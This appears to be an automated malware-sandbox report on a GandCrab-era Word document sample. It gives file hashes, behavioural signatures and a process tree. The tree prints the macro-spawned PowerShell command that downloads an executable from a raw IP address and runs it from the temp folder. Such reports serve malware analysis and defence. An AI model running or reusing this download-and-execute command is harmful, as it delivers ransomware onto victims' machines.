Overview
overview
10Static
static
10malware-sa...er.jpg
windows7-x64
3malware-sa...er.jpg
windows10-2004-x64
4malware-sa...6.docx
windows7-x64
7malware-sa...6.docx
windows10-2004-x64
1malware-sa...it.ps1
windows7-x64
10malware-sa...it.ps1
windows10-2004-x64
3malware-sa...ad.dll
windows7-x64
3malware-sa...ad.dll
windows10-2004-x64
3malware-sa...re.ps1
windows7-x64
10malware-sa...re.ps1
windows10-2004-x64
10malware-sa...7f.doc
windows7-x64
10malware-sa...7f.doc
windows10-2004-x64
10malware-sa...7f.vbs
windows7-x64
1malware-sa...7f.vbs
windows10-2004-x64
1malware-sa...fb9.js
windows7-x64
8malware-sa...fb9.js
windows10-2004-x64
8malware-sa...b72.js
windows7-x64
8malware-sa...b72.js
windows10-2004-x64
8malware-sa...8ca.js
windows7-x64
8malware-sa...8ca.js
windows10-2004-x64
8malware-sa...bf0.js
windows7-x64
8malware-sa...bf0.js
windows10-2004-x64
8malware-sa...a6e.js
windows7-x64
8malware-sa...a6e.js
windows10-2004-x64
8malware-sa...b41.js
windows7-x64
8malware-sa...b41.js
windows10-2004-x64
8malware-sa...8dd.js
windows7-x64
8malware-sa...8dd.js
windows10-2004-x64
8malware-sa...621.js
windows7-x64
8malware-sa...621.js
windows10-2004-x64
8malware-sa...982.js
windows7-x64
8malware-sa...982.js
windows10-2004-x64
8Analysis
-
max time kernel
119s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
17-02-2025 20:39
Behavioral task
behavioral1
Sample
malware-samples-master/2018-04-Common-Malware-Carrier/banner.jpg
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
malware-samples-master/2018-04-Common-Malware-Carrier/banner.jpg
Resource
win10v2004-20250217-en
Behavioral task
behavioral3
Sample
malware-samples-master/2018-04-Common-Malware-Carrier/d347e095369aba294f674331054df8469b12d5e3260deb168827142d862f88d6.docx
Resource
win7-20250207-en
Behavioral task
behavioral4
Sample
malware-samples-master/2018-04-Common-Malware-Carrier/d347e095369aba294f674331054df8469b12d5e3260deb168827142d862f88d6.docx
Resource
win10v2004-20250217-en
Behavioral task
behavioral5
Sample
malware-samples-master/2018-04-Common-Malware-Carrier/loadinglit.ps1
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
malware-samples-master/2018-04-Common-Malware-Carrier/loadinglit.ps1
Resource
win10v2004-20250217-en
Behavioral task
behavioral7
Sample
malware-samples-master/2018-04-Common-Malware-Carrier/payload.dll
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
malware-samples-master/2018-04-Common-Malware-Carrier/payload.dll
Resource
win10v2004-20250217-en
Behavioral task
behavioral9
Sample
malware-samples-master/2018-04-Common-Malware-Carrier/share.ps1
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
malware-samples-master/2018-04-Common-Malware-Carrier/share.ps1
Resource
win10v2004-20250217-en
Behavioral task
behavioral11
Sample
malware-samples-master/2018-04-GandCrab-Swarm/99eb1d90eb5f0d012f35fcc2a7dedd2229312794354843637ebb7f.doc
Resource
win7-20240903-en
Behavioral task
behavioral12
Sample
malware-samples-master/2018-04-GandCrab-Swarm/99eb1d90eb5f0d012f35fcc2a7dedd2229312794354843637ebb7f.doc
Resource
win10v2004-20250217-en
Behavioral task
behavioral13
Sample
malware-samples-master/2018-04-GandCrab-Swarm/99eb1d90eb5f0d012f35fcc2a7dedd2229312794354843637ebb7f.vbs
Resource
win7-20240903-en
Behavioral task
behavioral14
Sample
malware-samples-master/2018-04-GandCrab-Swarm/99eb1d90eb5f0d012f35fcc2a7dedd2229312794354843637ebb7f.vbs
Resource
win10v2004-20250217-en
Behavioral task
behavioral15
Sample
malware-samples-master/2018-04-GandCrab-Swarm/dropper-javascript/026b02380e79af4b1b0282c2473828c6fb9.js
Resource
win7-20240903-en
Behavioral task
behavioral16
Sample
malware-samples-master/2018-04-GandCrab-Swarm/dropper-javascript/026b02380e79af4b1b0282c2473828c6fb9.js
Resource
win10v2004-20250217-en
Behavioral task
behavioral17
Sample
malware-samples-master/2018-04-GandCrab-Swarm/dropper-javascript/0638e4dfe95bdae94a751404e4c91adbb72.js
Resource
win7-20240903-en
Behavioral task
behavioral18
Sample
malware-samples-master/2018-04-GandCrab-Swarm/dropper-javascript/0638e4dfe95bdae94a751404e4c91adbb72.js
Resource
win10v2004-20250217-en
Behavioral task
behavioral19
Sample
malware-samples-master/2018-04-GandCrab-Swarm/dropper-javascript/0cba53c366aeb34bd6dfb1ed1f9b9b7d8ca.js
Resource
win7-20241010-en
Behavioral task
behavioral20
Sample
malware-samples-master/2018-04-GandCrab-Swarm/dropper-javascript/0cba53c366aeb34bd6dfb1ed1f9b9b7d8ca.js
Resource
win10v2004-20250217-en
Behavioral task
behavioral21
Sample
malware-samples-master/2018-04-GandCrab-Swarm/dropper-javascript/20812b4ffe8a022d8eef35476095e385bf0.js
Resource
win7-20240903-en
Behavioral task
behavioral22
Sample
malware-samples-master/2018-04-GandCrab-Swarm/dropper-javascript/20812b4ffe8a022d8eef35476095e385bf0.js
Resource
win10v2004-20250217-en
Behavioral task
behavioral23
Sample
malware-samples-master/2018-04-GandCrab-Swarm/dropper-javascript/21d43c6b03d0e9827111572c9cbfa499a6e.js
Resource
win7-20241010-en
Behavioral task
behavioral24
Sample
malware-samples-master/2018-04-GandCrab-Swarm/dropper-javascript/21d43c6b03d0e9827111572c9cbfa499a6e.js
Resource
win10v2004-20250217-en
Behavioral task
behavioral25
Sample
malware-samples-master/2018-04-GandCrab-Swarm/dropper-javascript/233516df74662f82d61ae8025b6371ecb41.js
Resource
win7-20241023-en
Behavioral task
behavioral26
Sample
malware-samples-master/2018-04-GandCrab-Swarm/dropper-javascript/233516df74662f82d61ae8025b6371ecb41.js
Resource
win10v2004-20250217-en
Behavioral task
behavioral27
Sample
malware-samples-master/2018-04-GandCrab-Swarm/dropper-javascript/45e1a8582716c51212a45df8f26298cb8dd.js
Resource
win7-20240729-en
Behavioral task
behavioral28
Sample
malware-samples-master/2018-04-GandCrab-Swarm/dropper-javascript/45e1a8582716c51212a45df8f26298cb8dd.js
Resource
win10v2004-20250217-en
Behavioral task
behavioral29
Sample
malware-samples-master/2018-04-GandCrab-Swarm/dropper-javascript/56f0260ad67596e08a5017b0c62f0610621.js
Resource
win7-20240903-en
Behavioral task
behavioral30
Sample
malware-samples-master/2018-04-GandCrab-Swarm/dropper-javascript/56f0260ad67596e08a5017b0c62f0610621.js
Resource
win10v2004-20250217-en
Behavioral task
behavioral31
Sample
malware-samples-master/2018-04-GandCrab-Swarm/dropper-javascript/636897d92ddd9ba0e127366a3d4c816a982.js
Resource
win7-20241010-en
Behavioral task
behavioral32
Sample
malware-samples-master/2018-04-GandCrab-Swarm/dropper-javascript/636897d92ddd9ba0e127366a3d4c816a982.js
Resource
win10v2004-20250217-en
General
-
Target
malware-samples-master/2018-04-GandCrab-Swarm/99eb1d90eb5f0d012f35fcc2a7dedd2229312794354843637ebb7f.doc
-
Size
212KB
-
MD5
16ba8f5d604b4b9a366ae2d5b2107e68
-
SHA1
878f05a0ddc78db92cd844b5d13be93e7b25f343
-
SHA256
99eb1d90eb5f0d012f35fcc2a7dedd2229312794354843637ebb7f40b74d0809
-
SHA512
31544b5590e13df49138c5ae80a6adc9fdce4ea309b856099870b453e9419c8c05f433e18cfdf749a54798468502d21b660a9c9eb2bc02df7da31543d703e873
-
SSDEEP
6144:FvLzpvvAi+VLE5DnxWCDWSQB2Zye7+rXMl:pzpvv+pE5DxWskrX
Malware Config
Extracted
http://185.189.58.222/x.exe
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 2820 2160 powershell.exe 29 -
Blocklisted process makes network request 1 IoCs
flow pid Process 4 2820 powershell.exe -
pid Process 2820 powershell.exe 2820 powershell.exe 3004 powershell.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Office loads VBA resources, possible macro or embedded object present
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2160 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2820 powershell.exe 3004 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2820 powershell.exe Token: SeDebugPrivilege 3004 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2160 WINWORD.EXE 2160 WINWORD.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2160 wrote to memory of 2820 2160 WINWORD.EXE 30 PID 2160 wrote to memory of 2820 2160 WINWORD.EXE 30 PID 2160 wrote to memory of 2820 2160 WINWORD.EXE 30 PID 2160 wrote to memory of 2820 2160 WINWORD.EXE 30 PID 2820 wrote to memory of 3004 2820 powershell.exe 33 PID 2820 wrote to memory of 3004 2820 powershell.exe 33 PID 2820 wrote to memory of 3004 2820 powershell.exe 33 PID 2820 wrote to memory of 3004 2820 powershell.exe 33 PID 2160 wrote to memory of 2316 2160 WINWORD.EXE 34 PID 2160 wrote to memory of 2316 2160 WINWORD.EXE 34 PID 2160 wrote to memory of 2316 2160 WINWORD.EXE 34 PID 2160 wrote to memory of 2316 2160 WINWORD.EXE 34
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\malware-samples-master\2018-04-GandCrab-Swarm\99eb1d90eb5f0d012f35fcc2a7dedd2229312794354843637ebb7f.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2160 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -w 1 (New-Object System.Net.WebClient).DownloadFile('http://185.189.58.222/x.exe',([System.IO.Path]::GetTempPath()+'\PHfW.exe'));powershell.exe -w 1 Start-Process -Filepath ([System.IO.Path]::GetTempPath()+'\PHfW.exe');2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2820 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 Start-Process -Filepath C:\Users\Admin\AppData\Local\Temp\\PHfW.exe3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3004
-
-
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2316
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5c51e96a705f3083d04a10fa4159888dc
SHA10528489b2f057481a736885fc7b6165a06769036
SHA256b5ae16399809bd81fbdf6224ed017097f00bda4381c40ed45a0b68ec9eacfc62
SHA51214747ac429acb99b93d13f9f793f2dced5612153b5738c64a04740bfd9251fb541421edc45434fc10656a6f5aede2234e024e4bcdbe91ee9a1b5fbc81460ab2f